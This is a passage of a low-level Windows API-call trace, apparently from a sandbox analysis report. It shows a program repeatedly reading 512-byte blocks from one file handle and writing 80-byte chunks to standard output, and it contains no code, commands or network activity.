0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.163] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.163] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.164] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.164] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.165] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.165] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.166] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.166] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.167] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.167] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.169] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.169] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.170] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.170] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] 